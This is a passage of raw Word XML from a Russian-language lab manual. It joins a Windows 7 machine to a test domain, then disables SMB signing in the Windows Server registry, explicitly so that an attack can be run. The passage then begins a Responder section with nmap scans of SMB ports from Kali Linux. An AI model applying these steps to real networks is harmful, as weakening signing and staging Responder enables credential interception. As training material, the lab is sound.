          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2C52E646" wp14:editId="7607673E">
            <wp:extent cx="6120000" cy="4244719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24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C58C" w14:textId="0ABB441E" w:rsidR="00A96A86" w:rsidRPr="00A96A86" w:rsidRDefault="00EA4D56" w:rsidP="00EA4D5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30DC09" wp14:editId="4777F24E">
            <wp:extent cx="4320000" cy="2295292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9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BCF8" w14:textId="76EA152A" w:rsidR="009768D7" w:rsidRDefault="0092037C" w:rsidP="00C16296">
      <w:r>
        <w:t>8</w:t>
      </w:r>
      <w:r w:rsidR="00F83E9A" w:rsidRPr="00646388">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00F83E9A">
        <w:t xml:space="preserve">Добавить </w:t>
      </w:r>
      <w:r w:rsidR="00F83E9A">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00F83E9A" w:rsidRPr="00646388">
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r w:rsidR="00F83E9A">
        <w:t>в домен</w:t>
      </w:r>
      <w:r w:rsidR="00C7502C" w:rsidRPr="00C7502C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00C7502C">
        <w:t>под созданным пользователем</w:t>
      </w:r>
      <w:r w:rsidR="00DB30B6">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24BF2464" w14:textId="35482B52" w:rsidR="00966DB6" w:rsidRPr="00082908" w:rsidRDefault="00966DB6" w:rsidP="00966DB6">
      <w:r>
        <w:t>Так как в пункте 5.2 уже</w:t>
      </w:r>
      <w:r w:rsidR="00C618DE">
        <w:t xml:space="preserve"> была</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> прове</w:t>
      </w:r>
      <w:r w:rsidR="00C618DE">
        <w:t>дена</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> настройк</w:t>
      </w:r>
      <w:r w:rsidR="00C618DE">
        <w:t>а</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> статических адресов для обоих компьютеров, откройте свойства компьютера</w:t>
      </w:r>
      <w:r w:rsidR="00C618DE">
        <w:t xml:space="preserve">, перейдите в окно «Свойства системы» нажав на элемент интерфейса «Изменить параметры», а затем на кнопку «Изменить…». </w:t>
      </w:r>
      <w:r w:rsidR="00082908">
        <w:t xml:space="preserve">Введите имя компьютера и имя домена, созданного в </w:t>
      </w:r>
      <w:r w:rsidR="00082908">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00082908" w:rsidRPr="00082908">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00082908">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="00082908" w:rsidRPr="00082908">
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AAE9A8" w14:textId="5AAE3F7F" w:rsidR="00966DB6" w:rsidRDefault="00966DB6" w:rsidP="00966DB6">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="00E5B2CF" wp14:editId="56BB030C">
            <wp:extent cx="2880000" cy="219055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618DE">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="69C6CF17" wp14:editId="673C9941">
            <wp:extent cx="2880000" cy="216091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63D4" w14:textId="3CB870DB" w:rsidR="00811D61" w:rsidRPr="00366BFF" w:rsidRDefault="00811D61" w:rsidP="00C16296">
      <w:r>
        <w:t>Появление окна с просьбой ввести</w:t>
      </w:r>
      <w:r w:rsidRPr="00811D61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">данные </w:t>
      </w:r>
      <w:r w:rsidR="00366BFF">
        <w:t>пользователя подтверждает верность выполненных ранее настроек. Введите данные пользователя, созданного в пункте 7.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D2A077D" w14:textId="13F87D23" w:rsidR="00366BFF" w:rsidRPr="00366BFF" w:rsidRDefault="00366BFF" w:rsidP="00366BF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E56861" wp14:editId="521F5229">
            <wp:extent cx="4320000" cy="2670545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0C6E" w14:textId="77777777" w:rsidR="00847D61" w:rsidRDefault="00847D61" w:rsidP="00847D61">
      <w:r w:rsidRPr="0092037C">
        <w:t>9.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> Убедиться на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0092037C">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, что </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0092037C">
        <w:t xml:space="preserve"> 7 </w:t>
      </w:r>
      <w:r>
        <w:t>есть в домене.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3EE98914" w14:textId="488605CD" w:rsidR="00366BFF" w:rsidRDefault="00366BFF" w:rsidP="00C16296">
      <w:r>
        <w:t xml:space="preserve">Обратите внимание, что </w:t>
      </w:r>
      <w:r w:rsidR="00847D61">
        <w:t>результаты</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> выполнения операций</w:t>
      </w:r>
      <w:r w:rsidR="00847D61">
        <w:t xml:space="preserve"> пункта 8</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00847D61">
        <w:t xml:space="preserve">отразятся на </w:t>
      </w:r>
      <w:r w:rsidR="00847D61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidR="00847D61" w:rsidRPr="00847D61">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00847D61">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="00847D61" w:rsidRPr="00847D61">
        <w:t xml:space="preserve"> 2008</w:t>
      </w:r>
      <w:r w:rsidR="00847D61">
        <w:t xml:space="preserve"> в виде имени нашего компьютера, добавленного в домен.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BD5D360" w14:textId="584638AF" w:rsidR="00847D61" w:rsidRDefault="00847D61" w:rsidP="00847D61">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7A34DE51" wp14:editId="6C550A6D">
            <wp:extent cx="2880000" cy="2340688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4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81D8AD9" wp14:editId="01772D7D">
            <wp:extent cx="2880000" cy="23508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E6BE" w14:textId="4BC99F89" w:rsidR="00847D61" w:rsidRPr="00423AF3" w:rsidRDefault="00AC298E" w:rsidP="00C16296">
      <w:r>
        <w:t xml:space="preserve">После перезагрузки обоих компьютеров Вам необходимо на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00AC298E">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> зайти под</w:t>
      </w:r>
      <w:r w:rsidR="00423AF3">
        <w:t xml:space="preserve"> пользователем в домене. Для этого на стартовом окне после ввода клавиш </w:t>
      </w:r>
      <w:r w:rsidR="00423AF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Ctrl</w:t>
      </w:r>
      <w:r w:rsidR="00423AF3" w:rsidRPr="00423AF3">
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00423AF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Alt</w:t>
      </w:r>
      <w:r w:rsidR="00423AF3" w:rsidRPr="00423AF3">
        <w:t>+</w:t>
      </w:r>
      <w:r w:rsidR="00423AF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Delete</w:t>
      </w:r>
      <w:r w:rsidR="00423AF3" w:rsidRPr="00423AF3">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00423AF3">
        <w:t xml:space="preserve">нажмите на кнопку «Сменить пользователя» - «Другой пользователь» и введите в соответствующие поля данные созданного Вами в пункте 8 пользователя. Обратите внимание, что пользователь находится в домене </w:t>
      </w:r>
      <w:r w:rsidR="00423AF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>LABA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72329F8F" w14:textId="0C74721D" w:rsidR="00423AF3" w:rsidRPr="00423AF3" w:rsidRDefault="00423AF3" w:rsidP="00423AF3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:commentRangeStart w:id="4"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="6A4A7C27" wp14:editId="1A0BA099">
            <wp:extent cx="5399405" cy="4374108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50" b="3098"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5400000" cy="437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"/>
      <w:r w:rsidR="009E6CEC">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="4"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="68247D4A" w14:textId="2673CBBD" w:rsidR="00423AF3" w:rsidRDefault="00423AF3" w:rsidP="003B3E7C">
      <w:r>
        <w:t xml:space="preserve">После входа пользователя в настройках сервера появится запись о нашем компьютере на </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00423AF3">
        <w:t xml:space="preserve"> 7</w:t>
      </w:r>
      <w:r>
        <w:t>, которую Вам необходимо проверить.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="435BCBF4" w14:textId="4F9CB76C" w:rsidR="00423AF3" w:rsidRPr="00423AF3" w:rsidRDefault="00423AF3" w:rsidP="003B3E7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5DD367" wp14:editId="0D694D55">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>1979295</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1802926</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="3036627" cy="143036"/>
                <wp:effectExtent l="0" t="0" r="11430" b="28575"/>
                <wp:wrapNone/>
                <wp:docPr id="56" name="Овал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6627" cy="1430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oval w14:anchorId="7EA55595" id="Овал 56" o:spid="_x0000_s1026" style="position:absolute;margin-left:155.85pt;margin-top:141.95pt;width:239.1pt;height:1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" filled="f" strokecolor="#c00000" strokeweight="1pt">
                <v:stroke joinstyle="miter"/>
              </v:oval>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:commentRangeStart w:id="5"/>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="344350EF" wp14:editId="632A40E4">
            <wp:extent cx="5400000" cy="40485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9E6CEC">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="5"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="41E911B5" w14:textId="7EBA0973" w:rsidR="003B3E7C" w:rsidRDefault="003B3E7C" w:rsidP="003B3E7C">
      <w:r w:rsidRPr="00EB4790">
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">10. </w:t>
      </w:r>
      <w:r>
        <w:t>На</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB4790">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB4790">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Server</w:t>
      </w:r>
      <w:r w:rsidR="00DB30B6" w:rsidRPr="00EB4790">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DB30B6">
        <w:t>отр</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4115D">
        <w:t>едактируем</w:t>
      </w:r>
      <w:r w:rsidRPr="00EB4790">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:commentRangeStart w:id="6"/>
      <w:r w:rsidRPr="00E4115D">
        <w:t>реестр</w:t>
      </w:r>
      <w:commentRangeEnd w:id="6"/>
      <w:r w:rsidR="005E20E3">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="6"/>
      </w:r>
      <w:r w:rsidR="00EB4790" w:rsidRPr="00EB4790">
        <w:t xml:space="preserve"> выключ</w:t>
      </w:r>
      <w:r w:rsidR="00EB4790">
        <w:t>ив</w:t>
      </w:r>
      <w:r w:rsidR="00EB4790" w:rsidRPr="00EB4790">
        <w:t xml:space="preserve"> SMB </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00EB4790" w:rsidRPr="00EB4790">
        <w:t>Signing</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00EB4790" w:rsidRPr="00EB4790">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00EB4790">
        <w:t>для проведения</w:t>
      </w:r>
      <w:r w:rsidR="00EB4790" w:rsidRPr="00EB4790">
        <w:t xml:space="preserve"> атак</w:t>
      </w:r>
      <w:r w:rsidR="00EB4790">
        <w:t>и</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42096C3A" w14:textId="2FA355B5" w:rsidR="00E5134F" w:rsidRPr="00E5134F" w:rsidRDefault="00E5134F" w:rsidP="003B3E7C">
      <w:r>
        <w:t>Для</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5134F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>перехода</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5134F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>к</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5134F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">реестру выполните команду </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>regedit</w:t>
      </w:r>
      <w:r w:rsidRPr="00E5134F">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">любым удобным Вам способом, а затем перейдите в ветку реестра: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25591849" w14:textId="77777777" w:rsidR="003B3E7C" w:rsidRPr="00742EBE" w:rsidRDefault="003B3E7C" w:rsidP="003B3E7C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00742EBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66055F97" w14:textId="77777777" w:rsidR="003B3E7C" w:rsidRPr="00742EBE" w:rsidRDefault="003B3E7C" w:rsidP="003B3E7C">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4115D">
        <w:t>Выставить</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>0</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4115D">
        <w:t>для</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77311119" w14:textId="77777777" w:rsidR="003B3E7C" w:rsidRPr="00742EBE" w:rsidRDefault="003B3E7C" w:rsidP="003B3E7C">
      <w:pPr>
        <w:ind w:left="707"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742EBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>EnableSecuritySignature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3069E5D7" w14:textId="77777777" w:rsidR="003B3E7C" w:rsidRPr="00742EBE" w:rsidRDefault="003B3E7C" w:rsidP="003B3E7C">
      <w:pPr>
        <w:ind w:left="707"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00742EBE">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RequireSecuritySignature</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="0DE8AB97" w14:textId="52E6905A" w:rsidR="00E5134F" w:rsidRDefault="00E5134F" w:rsidP="00E5134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3CB8F7" wp14:editId="7D767A85">
            <wp:extent cx="5400000" cy="4014679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1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4963" w14:textId="2CE95182" w:rsidR="003B3E7C" w:rsidRPr="00984E27" w:rsidRDefault="002D32F8" w:rsidP="003B3E7C">
      <w:r w:rsidRPr="00984E27">
        <w:t>10.</w:t>
      </w:r>
      <w:r w:rsidR="003B3E7C" w:rsidRPr="00984E27">
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r w:rsidR="003B3E7C" w:rsidRPr="00E4115D">
        <w:t>Перезагрузка</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38434477" w14:textId="77777777" w:rsidR="003B3E7C" w:rsidRPr="00984E27" w:rsidRDefault="003B3E7C" w:rsidP="00C16296"/>
    <w:p w14:paraId="13C38BC5" w14:textId="5002052D" w:rsidR="00DF7137" w:rsidRPr="00984E27" w:rsidRDefault="002625D4" w:rsidP="00B54F4E">
      <w:pPr>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>II</w:t>
      </w:r>
      <w:r w:rsidR="00B54F4E" w:rsidRPr="00984E27">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00DF7137" w:rsidRPr="00DF7137">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Использование</w:t>
      </w:r>
      <w:r w:rsidR="00DF7137" w:rsidRPr="00984E27">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>инструмента</w:t>
      </w:r>
      <w:r w:rsidRPr="00984E27">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00DF7137" w:rsidRPr="00DF7137">
        <w:rPr>
          <w:b/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Responder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FD5AE00" w14:textId="77777777" w:rsidR="0087263B" w:rsidRPr="00742EBE" w:rsidRDefault="0087263B" w:rsidP="0087263B">
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Запускаем</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:r w:rsidRPr="00742EBE">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="538120FF" w14:textId="0D7CD950" w:rsidR="009E5132" w:rsidRDefault="00CE6A50" w:rsidP="009E5132">
      <w:r w:rsidRPr="00742EBE">
        <w:t>2</w:t>
      </w:r>
      <w:r w:rsidR="0087263B" w:rsidRPr="00742EBE">
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="00A66B90">
        <w:t>Поп</w:t>
      </w:r>
      <w:r w:rsidR="006E4793">
        <w:t xml:space="preserve">робовать </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="006E4793">
        <w:t>пропинговать</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="006E4793">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00984E27">
        <w:t xml:space="preserve">все </w:t>
      </w:r>
      <w:r w:rsidR="006E4793">
        <w:t>компьютеры</w:t>
      </w:r>
      <w:r w:rsidR="00A66B90">
        <w:t xml:space="preserve"> в домене</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BDBBF2A" w14:textId="17A5E348" w:rsidR="00A66B90" w:rsidRPr="009E4EDF" w:rsidRDefault="00A66B90" w:rsidP="009E5132">
      <w:r w:rsidRPr="00A66B90">
        <w:t xml:space="preserve">3. </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">Использовать </w:t>
      </w:r>
      <w:r w:rsidR="00017D46">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>N</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>map</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> без флагов и как в примере</w:t>
      </w:r>
      <w:r w:rsidR="002625D4">
        <w:t xml:space="preserve"> ниже</w:t>
      </w:r>
      <w:r w:rsidR="009E4EDF" w:rsidRPr="009E4EDF">
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="584170A5" w14:textId="77777777" w:rsidR="009E5132" w:rsidRPr="00150CF3" w:rsidRDefault="009E5132" w:rsidP="009E5132">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00150CF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00150CF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00A200FD" w:rsidRPr="00150CF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00150CF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>137,139,445 10.2.0.</w:t>
      </w:r>
      <w:commentRangeStart w:id="7"/>
      <w:r w:rsidRPr="00150CF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>15</w:t>
      </w:r>
      <w:commentRangeEnd w:id="7"/>
      <w:r w:rsidR="00B473DE">
        <w:rPr>
          <w:rStyle w:val="af6"/>
        </w:rPr>
        <w:commentReference w:id="7"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="618B413B" w14:textId="77777777" w:rsidR="0087263B" w:rsidRPr="00150CF3" w:rsidRDefault="007B696F" w:rsidP="0087263B">
      <w:pPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00150CF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Pn</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00150CF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00E44393" w:rsidRPr="00150CF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>p</w:t>
      </w:r>
      <w:r w:rsidRPr="00150CF3">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>137,139,445 10.2.0.16</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56290026" w14:textId="2C063724" w:rsidR="00017D46" w:rsidRDefault="00017D46" w:rsidP="0087263B">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>___________________________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07CDE7E0" w14:textId="519181AF" w:rsidR="00017D46" w:rsidRPr="00017D46" w:rsidRDefault="00017D46" w:rsidP="0087263B">
      <w:r>
        <w:t>Примечание:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58A9BEA6" w14:textId="4436DD20" w:rsidR="00017D46" w:rsidRDefault="00017D46" w:rsidP="0087263B">
      <w:r>
        <w:t xml:space="preserve">Из справки по </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Nmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>можно расшифровать элементы команды:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05895360" w14:textId="064254ED" w:rsidR="00017D46" w:rsidRDefault="00017D46" w:rsidP="0087263B">
      <w:r>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017D46">
        <w:t>map</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve"> ("</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017D46">
        <w:t>Network</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017D46">
        <w:t>Mapper</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve">") </w:t>
      </w:r>
      <w:r>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00017D46">
        <w:t xml:space="preserve"> это утилита с открытым исходным кодом для исследования сети и проверки безопасности.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DEA22F8" w14:textId="3F7E4DB0" w:rsidR="00017D46" w:rsidRDefault="00017D46" w:rsidP="0087263B">
      <w:r w:rsidRPr="00017D46">
        <w:t>-</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00017D46">
        <w:t>Pn</w:t>
      </w:r>
